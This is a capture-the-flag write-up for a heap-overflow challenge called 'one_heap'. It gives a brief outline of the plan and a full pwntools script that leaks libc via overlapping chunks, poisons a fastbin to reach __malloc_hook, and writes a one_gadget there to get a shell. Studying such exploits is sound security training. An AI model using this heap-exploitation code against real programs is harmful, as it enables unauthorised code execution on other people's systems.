pwn-one_heap(堆溢出)


思路:
构造双重身份的chunk泄露libc->伪造malloc附近的chunk->编辑将onegadget的值给malloc->调用malloc即调用onegadget->shell

from pwn import *
from LibcSearcher import *
def conn():
    """Start the local target and load the libc it is paired with.

    Sets the module globals ``r`` (the pwntools tube every menu wrapper
    writes to) and ``Libc`` (the ELF object used for symbol offsets).
    ``elf`` is declared global but never assigned here; the remote and
    ELF lines stay commented out as in the original.
    """
    global r, Libc, elf
    target_path = "./one_heap"
    libc_path = "./libc-2.23.so"
    r = process(target_path)
    Libc = ELF(libc_path)
    #r = remote("1.95.36.136", 2064)
    #elf = ELF("./pwn1")
def add(x, y, z):
    """Menu option 1: allocate a chunk through the target's menu.

    x is echoed (as text) after the "name:" prompt, y after "Size:",
    and z is sent as raw bytes after "Emo!:". Uses the global tube ``r``.
    """
    index_bytes = str(x).encode()
    size_bytes = str(y).encode()
    exchanges = (
        (b"Choice!\n", b"1"),
        (b"name:\n", index_bytes),
        (b"Size:\n", size_bytes),
        (b"Emo!:\n", z),
    )
    for prompt, payload in exchanges:
        r.sendlineafter(prompt, payload)
def edit(x, y):
    """Menu option 3: overwrite the contents of chunk x with bytes y.

    x is sent as text after the "index:" prompt, y as raw bytes after
    "Content". Uses the global tube ``r``.
    """
    index_bytes = str(x).encode()
    exchanges = (
        (b"Choice!\n", b"3"),
        (b"index:\n", index_bytes),
        (b"Content\n", y),
    )
    for prompt, payload in exchanges:
        r.sendlineafter(prompt, payload)
def free(x):
    """Menu option 2: release chunk x.

    x is sent as text after the "index:" prompt. Uses the global tube ``r``.
    """
    exchanges = (
        (b"Choice!\n", b"2"),
        (b"index:\n", str(x).encode()),
    )
    for prompt, payload in exchanges:
        r.sendlineafter(prompt, payload)
def show(x):
    """Menu option 4: ask the target to print chunk x.

    x is sent as text after the "index:" prompt; the reply is left in
    the tube for the caller to read. Uses the global tube ``r``.
    """
    exchanges = (
        (b"Choice!\n", b"4"),
        (b"index:\n", str(x).encode()),
    )
    for prompt, payload in exchanges:
        r.sendlineafter(prompt, payload)
def pwn():
    """Drive the menu wrappers through the sequence described in the write-up.

    Relies on the globals set by conn(): ``r`` (tube) and ``Libc`` (ELF of
    ./libc-2.23.so). Every constant below (0x3c4b78, the ``one`` offsets,
    the -0x23 adjustment, the 0x13 padding) is tied to that specific libc
    build and binary layout; the script is not expected to work unchanged
    against any other build.
    """
    add(0,0x68,b'a')
    add(1,0x68,b'a')
    add(2,0x68,b'a')
    add(3,0x68,b'a')
    # Writes 0x68 bytes of chunk 0 followed by 0xe1: the bytes after the
    # 0x68 payload land past chunk 0's usable area (into chunk 1's header,
    # presumably its size field).
    edit(0,0x68*b'a'+p64(0xe1))
    free(1)
    add(1,0x68,b'a')
    show(2)
    # Reads up to the first 0x7f byte and takes the 6 bytes before it as a
    # little-endian address; 0x3c4b78 is the offset subtracted to reach the
    # libc base for this libc build.
    libc = u64(r.recvuntil(b"\x7f")[-6:].ljust(8,b'\x00'))- 0x3c4b78
    print("libc>>>",hex(libc))
    malloc = libc+Libc.sym["__malloc_hook"]
    print("maloc>>>",hex(malloc-0x23))
    # Candidate offsets for this libc build; only index 2 is used.
    one = [0x4527a,0xf03a4,0xf1247]
    onegadget = libc+one[2]
    add(0,0x68,b'a')
    add(1,0x68,b'a')
    free(1)
    # Same overflow from chunk 0 as above, this time placing 0x71 and the
    # computed address after the 0x68-byte payload.
    edit(0,b'a'*0x68+p64(0x71)+p64(malloc-0x23))
    add(1,0x68,b'a')
    add(6,0x68,b'')
    # 0x13 bytes of padding then the 8-byte target value.
    edit(6,b'A'*(0x13)+p64(onegadget))
    print("onegadget>>>",hex(onegadget))
    #add(7,0x68,b'a')
    #r.sendlineafter(b"Choice!\n",b"1")
    # NOTE(review): a debugger is attached unconditionally here; without a
    # terminal/gdb available this call will fail or block before
    # interactive() is reached. Consider gating it behind a flag.
    gdb.attach(r)
    r.interactive()
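if __name__ == "__main__":
    # Guard the entry point so importing this file (e.g. to reuse the menu
    # wrappers) does not spawn the target process and start the run.
    conn()
    pwn()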

